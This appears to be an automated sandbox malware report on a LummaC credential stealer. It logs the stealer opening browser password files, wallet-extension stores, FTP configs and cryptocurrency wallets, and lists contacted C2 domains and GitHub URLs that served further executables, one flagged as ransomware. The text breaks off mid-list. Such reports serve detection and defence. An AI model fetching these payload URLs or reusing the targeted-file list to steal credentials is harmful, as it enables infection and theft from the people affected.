Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\AppData\Local\dll.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	Directory queried: C:\Users\user\Documents\BNAGMGSPLO	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	Directory queried: C:\Users\user\Documents\BNAGMGSPLO	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	Directory queried: C:\Users\user\Documents\CURQNKVOIX	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	Directory queried: C:\Users\user\Documents\CURQNKVOIX	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	Directory queried: C:\Users\user\Documents\CURQNKVOIX	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	Directory queried: C:\Users\user\Documents\CURQNKVOIX	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	Directory queried: C:\Users\user\Documents\NVWZAPQSQL	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	Directory queried: C:\Users\user\Documents\NVWZAPQSQL	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	Directory queried: C:\Users\user\Documents\PALRGUCVEH	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	Directory queried: C:\Users\user\Documents\PALRGUCVEH	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	Directory queried: C:\Users\user\Documents\RAYHIWGKDI	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	Directory queried: C:\Users\user\Documents\RAYHIWGKDI	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	Directory queried: C:\Users\user\Documents\UOOJJOZIRH	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	Directory queried: C:\Users\user\Documents\UOOJJOZIRH	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	Directory queried: C:\Users\user\Documents\WKXEWIOTXI	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	Directory queried: C:\Users\user\Documents\WKXEWIOTXI	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	Directory queried: C:\Users\user\Documents\SQRKHNBNYN	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	Directory queried: C:\Users\user\Documents\SQRKHNBNYN	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	Directory queried: C:\Users\user\Documents\BNAGMGSPLO	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	Directory queried: C:\Users\user\Documents\BNAGMGSPLO	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	Directory queried: C:\Users\user\Documents\CURQNKVOIX	Jump to behavior
Source: C:\Users\user\AppData\Local\dll.exe	Directory queried: C:\Users\user\Documents\CURQNKVOIX	Jump to behavior

Source: Yara match	File source: 00000010.00000003.1495951794.000000000124F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.1472449424.000000000124F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: dll.exe PID: 8252, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: dll.exe PID: 8252, type: MEMORYSTR
Source: Yara match	File source: 13.2.jaclo.exe.ba0000.0.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	12 Windows Management Instrumentation	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	2 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 PowerShell	1 Registry Run Keys / Startup Folder	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 System Network Connections Discovery	Remote Desktop Protocol	41 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	11 Process Injection	4 Obfuscated Files or Information	Security Account Manager	12 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 Registry Run Keys / Startup Folder	12 Software Packing	NTDS	42 System Information Discovery	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	551 Security Software Discovery	SSH	Keylogging	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	1 Process Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	421 Virtualization/Sandbox Evasion	DCSync	421 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Process Injection	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	HTML Smuggling	/etc/passwd and /etc/shadow	1 System Network Configuration Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
LauncherV9.exe	49%	Virustotal		Browse
LauncherV9.exe	39%	ReversingLabs	Win64.Trojan.Generic

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\dll.exe	100%	Avira	HEUR/AGEN.1314134
C:\zjxbeopkqt\jaclo.exe	100%	Avira	HEUR/AGEN.1314134
C:\Users\user\AppData\Local\Service.exe	69%	ReversingLabs	Win32.Ransomware.Generic
C:\Users\user\AppData\Local\dll.exe	83%	ReversingLabs	Win32.Trojan.LummaStealer
C:\zjxbeopkqt\jaclo.exe	88%	ReversingLabs	Win32.Trojan.LummaStealer

Source	Detection	Scanner	Label
http://api.ipify.org6	0%	Avira URL Cloud	safe
http://store.steampowered	0%	Avira URL Cloud	safe
http://api.ipify.orgc	0%	Avira URL Cloud	safe
https://pupmeholk.bet/pLoskaDGcj9wXRZ1	0%	Avira URL Cloud	safe
http://api.ipify.orgInternetOpenUrl	0%	Avira URL Cloud	safe
https://pupmeholk.bet/#kK	0%	Avira URL Cloud	safe
https://bugildbett.top/	100%	Avira URL Cloud	malware
https://latchclan.sh	0%	Avira URL Cloud	safe
https://community.clo	0%	Avira URL Cloud	safe
http://api.pifk	0%	Avira URL Cloud	safe
https://pupmeholk.bet/	0%	Avira URL Cloud	safe
https://pupmeholk.bet/pLoska	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
steamcommunity.com	23.197.127.21	true	false	high
github.com	140.82.121.4	true	false	high
pupmeholk.bet	104.21.96.1	true	false	unknown
raw.githubusercontent.com	185.199.110.133	true	false	high
api.ipify.org	104.26.12.205	true	false	high
weaponrywo.digital	unknown	unknown	false	high
latchclan.shop	unknown	unknown	false	high
featureccus.shop	unknown	unknown	false	high
bugildbett.top	unknown	unknown	false	high
mrodularmall.top	unknown	unknown	false	high
crosshairc.life	unknown	unknown	false	high
cjlaspcorne.icu	unknown	unknown	false	high
jowinjoinery.icu	unknown	unknown	false	high
legenassedk.top	unknown	unknown	false	high
htardwarehu.icu	unknown	unknown	false	high
kbracketba.shop	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://api.ipify.org/	false		high
https://steamcommunity.com/profiles/76561199822375128	false		high
https://github.com/deripascod/coderoom/raw/refs/heads/main/opyksdkawddd.exe	false		high
https://github.com/deripascod/coderoom/raw/refs/heads/main/Service.exe	false		high
https://pupmeholk.bet/pLoska	false	Avira URL Cloud: safe	unknown
https://github.com/deripascod/coderoom/raw/refs/heads/main/mtohpasekfaddd.exe	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://player.vimeo.com	dll.exe, 00000010.00000002.1611980427.00000000011F5000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	dll.exe, 00000010.00000003.1449202247.0000000004118000.00000004.00000800.00020000.00000000.sdmp	false		high
http://api.ipify.orgc	Service.exe, 00000017.00000002.2513144408.00000270A9E9C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.cloudflare.steamstatic.com/public/javascript/profile.js?v=47omfdMZRDiz&l=engli	dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/?subsection=broadcasts	jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=oQ1d_VAfa_o	jaclo.exe, 0000000D.00000003.1397866744.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553180293.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001261000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610907365.0000000001264000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610850304.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.000000000125F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1495951794.000000000124F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586877703.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612167394.0000000001258000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1472449424.000000000125C000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.000000000125F000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.microsoft.co	dll.exe, 00000010.00000003.1423975243.000000000120A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436310085.00000000011FB000.00000004.00000020.00020000.00000000.sdmp	false		high
http://api.ipify.org/fons	Service.exe, 00000018.00000002.2512975134.0000026791D09000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=N4H9vOOxi8kG&l=english&am	jaclo.exe, 0000000D.00000003.1397866744.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553180293.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001261000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610907365.0000000001264000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610850304.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.000000000125F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001269000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1495951794.000000000124F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586877703.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612167394.0000000001258000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1611173934.000000000400E000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1472449424.000000000125C000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.000000000125F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/subscriber_agreement/	jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.gstatic.cn/recaptcha/	dll.exe, 00000010.00000002.1611980427.00000000011F5000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/profiles/76561199822375128/badges	dll.exe, 00000010.00000003.1553180293.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1523252208.0000000004028000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001254000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/profiles/76561199822375128/inventory/	dll.exe, 00000010.00000003.1558141720.0000000001250000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000401C000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1471974297.0000000004017000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1471755815.000000000401C000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1496127922.000000000401A000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1496560456.000000000401B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1472429859.0000000004018000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586774168.000000000401C000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1523252208.0000000004028000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553410634.000000000401C000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571451074.000000000401C000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1523296079.000000000401B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001254000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1471708256.000000000402C000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1613114498.000000000401C000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1495899437.0000000004015000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1523271647.0000000004014000.00000004.00000800.00020000.00000000.sdmp, 